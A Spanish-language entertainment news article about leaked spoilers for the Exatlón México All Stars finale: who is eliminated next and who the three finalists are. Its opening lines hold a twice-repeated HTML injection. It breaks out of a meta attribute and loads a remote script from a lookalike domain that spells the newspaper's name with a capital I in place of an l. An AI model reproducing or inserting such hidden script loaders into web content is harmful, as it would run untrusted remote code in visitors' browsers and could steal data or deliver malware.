Javi Márquez y Patricio Araujo son los próximos dos elementos en abandonar la competencia del Exatlón México All Stars.                                      " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok Javi Márquez y Patricio Araujo son los próximos dos elementos en abandonar la competencia del Exatlón México All Stars.                                      " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok

Exatlón México All Stars: Filtran detalles de lo que sucederá este domingo 24 de abril

Exatlón México All Stars vivirá su último domingo de eliminación y se dieron detalles de lo que sucederá este 24 de abril. 

CIUDAD DE MÉXICO.- El Exatlón México All Stars vivirá este 24 de abril su último domingo de eliminación, y en redes sociales ya se adelantaron detalles de lo que sucederá en las pantallas de televisión. 

Según información de la llamada "Reina de los Spoilers", el próximo elemento que abandonará la competencia es Javi Márquez, quien tendría que decir adiós este mismo día.

Además, se sabe que se dejará la mesa servida para que en el capítulo del lunes 25 de abril se transmita la eliminación de Patricio Araujo. 

¿QUIÉNES SON LOS TRES FINALISTAS?

Desde ayer ya se filtró la información que asegura que Mati Álvarez, Koke Guerrero y Heliud Pulido son los elementos que llegaron a la gran final y los que pelean por la corona. 

Esto quiere decir que en los programas del miércoles y jueves se verán las eliminaciones de Evelyn Guijarro y David Juárez "La Bestia" uno de los favoritos a quedarse con el título. 

Noticias Relacionadas

TE PUEDE INTERESAR

MÁS NOTICIAS

MÁS NOTICIAS